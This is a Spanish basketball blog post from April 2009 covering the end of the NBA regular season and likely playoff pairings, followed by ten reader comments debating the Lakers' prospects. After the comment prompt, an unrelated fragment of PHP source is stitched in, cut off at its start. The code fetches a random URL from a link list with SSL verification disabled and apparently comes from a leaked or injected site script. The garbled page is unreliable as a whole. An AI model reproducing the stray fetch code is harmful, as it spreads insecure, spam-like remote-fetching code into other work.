La Crónica (14/04/2009)

15 de April de 2009 por TheDeerHunter

Ya tenemos un par de cruces claros que anoche pudimos tantear en un completo aperitivo de playoffs.

Finalmente los Lakers alcanzan las 65 victorias, con un regusto algo agridulce. Este es el sino del equipo amarillo. Un resultado brillante, el tercer mejor balance en un historial glorioso. Asegurando la ventaja campo durante todo su cuadro y la gran mayoría del otro. Llegando al momento clave con la plantilla al completo y jugando en líneas generales muy bien. Pero da igual, los Cavs han quedado por delante… Y aunque no lo hubieran hecho nada podrán hacer para evitar el término fracaso si no logran el anillo.

A los Celtics les pasa algo similar. Ya podrían darse con un canto en los dientes de lograr la mitad de las temporadas alrededor de 60 victorias y con todas las penurias que han pasado esta. Sensación casi derrotista que de seguro purgarán en el primer minuto de las eliminatorias. Ellos, al menos, ya tienen el anillo y la sensación de fracaso será menor si no lo logran. La trampa de la grandeza.

Los amarillos se cruzarán con Utah. Anoche, sin despeinarse, le dieron otro baile a la defensa de Sloan que aclara porqué los mormones se han quedado en la octava plaza. Por lo visto, el ánimo ofensivo de los jugadores no comulga con el defensivo del técnico y por ahí una larga lista de desencuentros por todos lados. Cuando los resultados no llegan siempre sucede lo mismo. Este equipo se deshace, pero mal harán los Lakers en confiarse. Los playoffs siempre son otra cosa.

Los verdes tienen muchas opciones de cruzarse con Philadelphia ya que solamente se ha cumplir la premisa de que los Bulls ganen a Toronto en casa. Los Sixers atraviesan un bajón muy preocupante a estas alturas y con el único “Big Three” disponible (Paul Pierce) fue suficiente para dar buena cuenta de ellos. Y por cierto, volvió “el León” Powe, con la falta que hace este hombre. Tiene toda la pinta que, de llevarse a cabo finalmente, será una eliminatoria bastante plácida para los campeones.

El que también está definido es el cruce Atlanta-Miami. Anoche jugaron al ratón y al gato. Wade descansó y los Hawks jugaron pero poquito, no sea que muestren algunas de sus cartas. Como si no las conociéramos ya de memoria tras 82 partidos o como si 20 minutos más de descanso en toda una temporada fuera a ser decisivo. Ganó Atlanta de dos puntos… pero fue casi un amistoso preparatorio.

PREMIOS

MVP: Pierce estuvo fino contra los Sixers y coló 7 de 9 triples anotando un total de 31 puntos. Pau no descansó anoche tampoco y sumó otra excelente actuación con 20 puntos, 9 rebotes, 6 asistencias, 2 tapones y un robo, todo con extraordinaria eficacia. Para evitar discrepancias lo dejamos ahí.

El Rookie: En ausencia de Wade, Beasley agarró galones como a él le gusta. 23 puntos, 13 rebotes, 2 tapones… ¡y 2 asistencias! En 24 minutos son actuación indiscutiblemente de crack aunque se prodigue poco.

La Sorpresa: El banquillo de Lakers que, con Odom a la cabeza, vuelve a funcionar. Buenísima aportación general de Shannon Brown, pero anoche, hasta Vujacic se salió, con la mala racha que llevaba. En los Celtics, Tony Allen de titular también estuvo sensacional. 18 puntos, 4 rebotes, 5 asistencias y 3 robos. Lo de Glen Davis ya no lo podemos considerar sorpresa.

La Decepción: Supongo que se la llevarían los que pagaron la entrada por ver ayer la farsa entre Atlanta y Miami pensando que se iban a jugar algo. Los aficionados de los Sixers también se quedarían con la mosca tras la oreja.

El mayor esfuerzo en vano: La pareja Deron-Kirilenko estuvo fortísima. Pero los Jazz no hicieron demasiado en evitar la sangría.

RAZONES PARA TRASNOCHAR

Última jornada de la liga regular y algunos enfrentamientos de Playoffs aún por decidir.

En el Oeste no le podemos quitar el ojo al Houston-Dallas, el New Orleans-San Antonio y el Denver-Portland. En juego, el no caer hasta la quinta posición y perder la ventaja de campo en primera ronda, que vista la igualdad reinante entre los equipos puede ser decisiva. Los Rockets se asegurarían la 3 plaza (y un enfrentamiento con los Hornets) venciendo a los Mavs mientras que Blazers y Spurs jugarán con una mirada en lo que suceda en el American Airlines Center de Dallas. Paralelamente también se ha de decidir quien queda por delante en la clasificación: Mavs o Hornets. El que quede séptimo se enfrentará a los Nuggets… Impresionantes eliminatorias todas en cualquier caso.

En el Este la atención se centra en el Toronto-Chicago y, en menor medida, en el Philadelphia-Cleveland. Si los Bulls ganan se asegurarían la sexto posición y un enfrentamiento con los Magic en primera ronda. Si pierden, aún deberían ganar los Sixers en el Quicken Loans Arena para adelantarles. Misión casi imposible. Como curiosidad las 2 rachas antagonistas de los equipos implicados: Chicago ha ganado 5 partidos consecutivos mientras que Philadelphia ha perdido sus 6 últimos encuentros.

Comenta

10 comentarios a esta entrada

  1. bastian dice:
    #1

    Alucinante lo que hizo Beasley en 24 minutos, aunque por lo que cuentas muy poca defensa debió haber. Si Miami quiere pasar la eliminatoria necesita alguien que ayude a Wade, porque Atlanta es en mi opinion el equipo más físico de la NBA y será tanto más duro cuanto más partidos se jueguen.

    El Lakers-Jazz de playoffs se me antoja una eliminatoria fácil para los angeles más que nada por el momento que llega cada uno. Aunque Utah se crece en su casa y puede ganar algún partido. Apuesto por un 4-1.

    Espero ansioso los playoffs para los Bulls. Como bien dices es fácil que logren el sexto puesto y viendo el cúmulo de infortunios y lesiones de los Magic y lo fuerte que viene Chicago, yo apuesto por que pasan estos. Creo que Noah y Tyrus T han ganado protagonismo en el juego del equipo y han madurado mucho este año, y unido a la veteranía que aportan Salmons y Miller, al liderazdo de Rose y Gordon y la ayuda de Hinrich me atrevo a decir que en este punto de la temporada Chicago es el equipo más impredecible que llega a pos y puede ganar a cualquiera. Apuesto más con el corazón que con la cabeza unas finales Cavs-Bulls.

    PD: Acabo de conocer tu página y es muy buena. Sigue así!

      Citar

  2. Viva_Dirk dice:
    #2

    No entiendo el tono pesimista que se le da ahora a los Lakers, con Bynum sano han sido el mejor equipo de la competición si duda, tienen el factor cancha como mínimo hasta la final de conferencia, son el único equipo que ha ganado a los Cavs en su casa y de los equipos que juegan los play-offs en el Oeste solo los Hornets han conseguido ganar en el Staples.

    Con todo esto el que tenga canguelo es solo por algo personal y sin motivo alguno.

    En cuanto a que otra cosa que no sea el anillo será un fracaso, pues si y no, como dice una canción bastante mala ‘todo depende’.

      Citar

  3. TheDeerHunter dice:
    #3

    Bueno… aquí nadie habla de canguelo. Pero para acontecer lo que has dicho y que es la tercera mejor marca de su historia tampoco nadie prende los fuegos de artificio. Además, podríamos consultar en cualquier hemeroteca el pasote de críticas que se llevaron el año pasado tras la final y entonces lo tenían mucho más difícil que ahora. En lo personal podríamos discutir fracaso o no según las circunstancias y el juego… en lo general, Kobe y este equipo están hechos para ser campeones y si no lo llegan a lograr por cualquier motivo, por supuesto que será un fracaso… además histórico.

    Después, el análisis que haces es acertado. Han jugado muy bien por momentos… mejor que nadie. Pero también ha habido indicadores negativos que han llegado a preocupar… ni más ni menos que a tito Phil y así lo ha expresado públicamente hace no demasiados días, por cierto.
    De todos esos detalles podríamos comentar el tono defensivo y físico, que sigue siendo inferior a la mayoría de gallos del este (te recuerdo que era un factor que se deseaba corregir desde el principio de la temporada y más o menos están como entonces) la exposición a los arranques emocionales de Kobe; el bajo rendimiento general de los suplentes, incluído Odom con la correspondiente sobrecarga de minutos para, sobre todo, Gasol; las lagunas de concentración que durante muchos momentos sufre el equipo (otro factor recurrente del año pasado)… no es pesimismo analizar también las partes sombrías del cuadro. Es objetividad.
    Ahora el enfrentamiento contra Utah parece bastante más complicado que lo del año pasado contra Denver y eso que el año pasado alucinábamos con el Wild Wild West. Seguramente si me hubieran dado a elegir rival libremente hubiera preferido Philadelphia.

    Con respecto a Chicago… si de verdad Orlando no logra recuperar sus piezas lo va a tener muy jodido. Chicago ahora mismo es un equipo bien construido, de hecho me parece bastante mejor plantilla que Orlando sin Nelson, Turkoglu ni Lewis. El asunto es que no tienen a D. Howard… ni un juego interior que digas la reostia para pararle. Veremos qué es lo que pesa más en todo esto, pero estoy de acuerdo con que de las eliminatorias que más o menos tenemos claras es la más imprevisible a priori.

      Citar

  4. TheDeerHunter dice:
    #4

    en lo del la canción completamente de acuerdo, Viva… para que luego no digan que somos siempre contrarios… 😀

      Citar

  5. Elio dice:
    #5

    Estoy de acuerdo, hay que remarcar las buenísimas temporadas de Lakers y Celtics. No siempre se llega a las 60 victorias, que se lo digan a los Bulls del 93 o a los 57 equipos de los Lakers que lo han hecho peor durante 57 temporadas que los Kobe, Pau & company.

      Citar

  6. Viva_Dirk dice:
    #6

    Analicemos entonces esos puntos negativos:

    – El tono defensivo y físico. Si no pasa nada grave tendremos a Bynum al 100%, ese plus defensivo y físico es innegable, también está Shannon Brown que practicamente ha venido para eso, al igual que deberiamos ver un pico físico de Ariza que lleva un par de meses malos.

    – Los arranques emocionales de Kobe. No se a que te refieres exactamente, si te refieres a que intenta tener demasiado protagonismo no creo que estemos mas expuestos a eso que los Cavs con Lebron, los Nuggets con Melo, los Celtics con Pierce/Garnett o cualquiera del resto de aspirantes con su estrella(los que la tengan).

    – El bajo rendimiento de los suplentes. Puede ser, personalmente creo en una buena planificación de los momentos de forma, los cuales en el caso de Odom ha trastocado bastante la lesión de Bynum, pero igual que antes no veo que ningun banquillo este funcionando muy bien, salvo quizá el de Chicago o Portland.

    – Las lagunas de concentración. Esto no hay manera de negarlo, es sin duda mi mayor preocupación.

      Citar

  7. couxe dice:
    #7

    Yo estoy con Viva, veo a los Lakers como favoritos, y no veo porqué deben sentir miedo, ni porqué hay sensación de duda sobre ellos…
    Es más, creo que son sus rivales los que sienten que no va a haber forma de incarles el diente si cuentan con todos sus jugadores en buen estado físico como parece…

      Citar

  8. Jabho dice:
    #8

    Ya están ahí los PO y creo que la regular debe dejar buenas sensaciones tanto a Cavs, Lakers o Celtics y regulares o malas al resto.

    Los Cavs han ganado la regular. Objetivo cumplido así que llegan a PO con ventaja de campo y paz de espiritu

    Los Lakers han sido 2º´s y han ganado el Oeste tan, tan fácil que quizás esa facilidad les ha impedido ganar la liga. Por lo demás pueden pensar con razón que con Bynum fueron los mejores ¿porque no iban a volver a ser de nuevo con su vuelta?

    Los Celtics empezaron siendo los amos del cotarro y a pesar de ser un año muy problemático han mantenido un buen ritmo de partidos. Recuperan a todos o casi para PO y al igual que los Lakers eso ya es motivo para confiar.

    Los que salen peor parados de la regular son los Spurs o los Magic a los que las lesiones les limitan a la hora de aspirar a ganar.

    Ahora empieza lo bueno y de verdad que creo que no hacen falta banquillos tan profundos en los PO como en la regular. Hay más descanso y los objetivos están muy a mano….

    A mi me da que estos 3 equipos (Lakers, Celtics y Cavs) se van a pasear hasta que se enfrenten entre ellos. No veo a ninguno de ellos perdiendo más de dos partidos hasta finales de conferencia salvo que los MAgic recuperen el tono.

    Por cierto, insisto que de wild, wild west ya queda muy poco

      Citar

  9. Txusma dice:
    #9

    El tema del Wild Wild West es recurrente, pero podemos estar de acuerdo en q el 9 equipo del Oeste (Phoenix) podria ganar al 4 del Este (Atlanta) en un Playoff a 7 partidos, no? Y en cambio al reves (Indiana-Portland) como que no lo veo…

      Citar

  10. TheDeerHunter dice:
    #10

    No iba a pasar la oportunidad para contestar la sesuda réplica del compañero Viva…
    – El tono defensivo y físico. Por lo físico quizás podrías pensar en que el equipo ha mejorado, en efecto. Sin embargo el aspecto defensivo y, sin embargo, el balance ataque-defensa es casi calcado al del año pasado. En definitiva con las cifras en la mano apenas se ha notado el efecto de esa supuesta mejora.
    – Cuando hablaba de los arranques emocionales de Kobe hablaba precísamente de eso. A mí me parece que Kobe, en ocasiones tiende a perder el norte en su relación a sus compañeros. Según las dificultades de un determinado choque le cuesta leer cuándo debe delegar responsabilidades. Está claro que cuando el equipo se atasca la responsabilidad debe recaer sobre sus espaldas… pero a veces se obceca y le cuesta soltar esa responsabilidad en las contadas veces que él se atasca y sus compañeros están bien. Llegué a pensar que abandonaría ese vicio tras las épocas de penurias y la llegada de Pau pero no ha sido del todo así. Precísamente ese es el detalle que más le alejan de Jordan.
    – De momento no puedo discutirte sobre una o mala planificación del estado de forma de los suplentes si te refieres a que se ha diseñado para que lleguen bien a ahora. En mi opinión a priori era fundamental proteger los minutos, sobre todo, el desgaste de Pau, Kobe o Fisher y ni de coña ha sido así. Es cierto que lo de Bynum fue una incidencia grave en ese sentido pero creo que no seré el único que esperaba mucho más, sobre todo de algunos a los que les afectaba poco la lesión del pívot. Decís que en playoffs es menos importante el concurso de la segunda línea y en ese sentido el mal ya está hecho. No obstante yo matizo. Para según que equipos es más importante la segunda línea y para otros menos, lo mismo que el factor cancha. Ese aspecto se notó sobremanera el año pasado en el que la derrota de Lakers vino en buena parte motivada por ese lado (todavía tengo pesadillas con Posey, House, Casell, Powe, Davis…)
    Opino que los Lakers necesitan, como mínimo, mantener el tipo con la 2ª línea sino marcar la diferencia. Como también creo que Cleveland necesitaba el factor cancha obligatoriamente para tener alguna opción de ganar a Lakers, o los Lakers lo mismo para ganar a los Celtics. De los campeones en cambio, no lo veo tan necesario, ni una cosa ni la otra.

    Por último, insisto… no se trata de marcar una línea de pesimismo con respecto a Lakers… sino de remarcar precísamente lo contrario. La grandeza conlleva exigencia y Lakers y Celtics haciendo ambos una regular muy meritoria no han podido evitar cierto sentimiento de fracaso, patente en todos los medios (lo podéis consultar)… y si no ganan el anillo lo veremos más todavía.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>